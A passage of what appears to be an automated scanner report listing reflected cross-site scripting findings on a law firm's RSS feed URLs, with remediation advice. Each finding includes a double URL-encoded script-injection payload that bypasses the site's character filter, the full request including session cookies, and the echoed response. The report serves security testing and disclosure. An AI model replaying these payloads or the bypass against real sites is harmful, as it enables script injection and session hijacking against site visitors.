<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssac191"><script>alert(1)</script>408ea2dc39c/practices/Environment__Safety/rss.xml" value="">
...[SNIP]...

2.167. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d was submitted in the REST URL parameter 2. This input was echoed as faef9"><script>alert(1)</script>09c7b47057d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesfaef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesfaef9"><script>alert(1)</script>09c7b47057d/Environment__Safety/rss.xml" value="">
...[SNIP]...

2.168. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872 was submitted in the REST URL parameter 3. This input was echoed as 14f97"><script>alert(1)</script>df3bd752872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Environment__Safety14f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf3bd752872/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Environment__Safety14f97"><script>alert(1)</script>df3bd752872/rss.xml" value="">
...[SNIP]...

2.169. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 was submitted in the REST URL parameter 4. This input was echoed as a8458"><script>alert(1)</script>9d96a6b3a12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Environment__Safety/rss.xmla8458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9d96a6b3a12 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Environment__Safety/rss.xmla8458"><script>alert(1)</script>9d96a6b3a12" value="">
...[SNIP]...

2.170. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2 was submitted in the REST URL parameter 1. This input was echoed as 53bc2"><script>alert(1)</script>4c6054d33b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss53bc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss53bc2"><script>alert(1)</script>4c6054d33b2/practices/Food__Drug_and_Product_Safety/rss.xml" value="">
...[SNIP]...

2.171. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82 was submitted in the REST URL parameter 2. This input was echoed as 99d18"><script>alert(1)</script>a1c0da64d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices99d18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1c0da64d82/Food__Drug_and_Product_Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices99d18"><script>alert(1)</script>a1c0da64d82/Food__Drug_and_Product_Safety/rss.xml" value="">
...[SNIP]...

2.172. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21 was submitted in the REST URL parameter 3. This input was echoed as de427"><script>alert(1)</script>3670bef0e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Food__Drug_and_Product_Safetyde427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3670bef0e21/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Food__Drug_and_Product_Safetyde427"><script>alert(1)</script>3670bef0e21/rss.xml" value="">
...[SNIP]...

2.173. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Food__Drug_and_Product_Safety/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 was submitted in the REST URL parameter 4. This input was echoed as f92a2"><script>alert(1)</script>41efcd82b21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41efcd82b21 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Food__Drug_and_Product_Safety/rss.xmlf92a2"><script>alert(1)</script>41efcd82b21" value="">
...[SNIP]...

2.174. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06 was submitted in the REST URL parameter 1. This input was echoed as a6fba"><script>alert(1)</script>a4316059e06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssa6fba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4316059e06/practices/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssa6fba"><script>alert(1)</script>a4316059e06/practices/Franchise/rss.xml" value="">
...[SNIP]...

2.175. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0 was submitted in the REST URL parameter 2. This input was echoed as b78b0"><script>alert(1)</script>9778950fc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesb78b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9778950fc0/Franchise/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesb78b0"><script>alert(1)</script>9778950fc0/Franchise/rss.xml" value="">
...[SNIP]...

2.176. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8 was submitted in the REST URL parameter 3. This input was echoed as d4984"><script>alert(1)</script>61790d4d9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Franchised4984%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61790d4d9a8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Franchised4984"><script>alert(1)</script>61790d4d9a8/rss.xml" value="">
...[SNIP]...

2.177. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Franchise/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b was submitted in the REST URL parameter 4. This input was echoed as 214b4"><script>alert(1)</script>273c67fee0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Franchise/rss.xml214b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e273c67fee0b HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Franchise/rss.xml214b4"><script>alert(1)</script>273c67fee0b" value="">
...[SNIP]...

2.178. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2 was submitted in the REST URL parameter 1. This input was echoed as f2dde"><script>alert(1)</script>ed620a3a2e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssf2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2/practices/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssf2dde"><script>alert(1)</script>ed620a3a2e2/practices/Government_Contracts/rss.xml" value="">
...[SNIP]...

2.179. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6 was submitted in the REST URL parameter 2. This input was echoed as ad839"><script>alert(1)</script>b98612c93e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6/Government_Contracts/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesad839"><script>alert(1)</script>b98612c93e6/Government_Contracts/rss.xml" value="">
...[SNIP]...

2.180. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2 was submitted in the REST URL parameter 3. This input was echoed as a8ea8"><script>alert(1)</script>7c519c08fc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Government_Contractsa8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Government_Contractsa8ea8"><script>alert(1)</script>7c519c08fc2/rss.xml" value="">
...[SNIP]...

2.181. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Government_Contracts/rss.xml

Issue detail

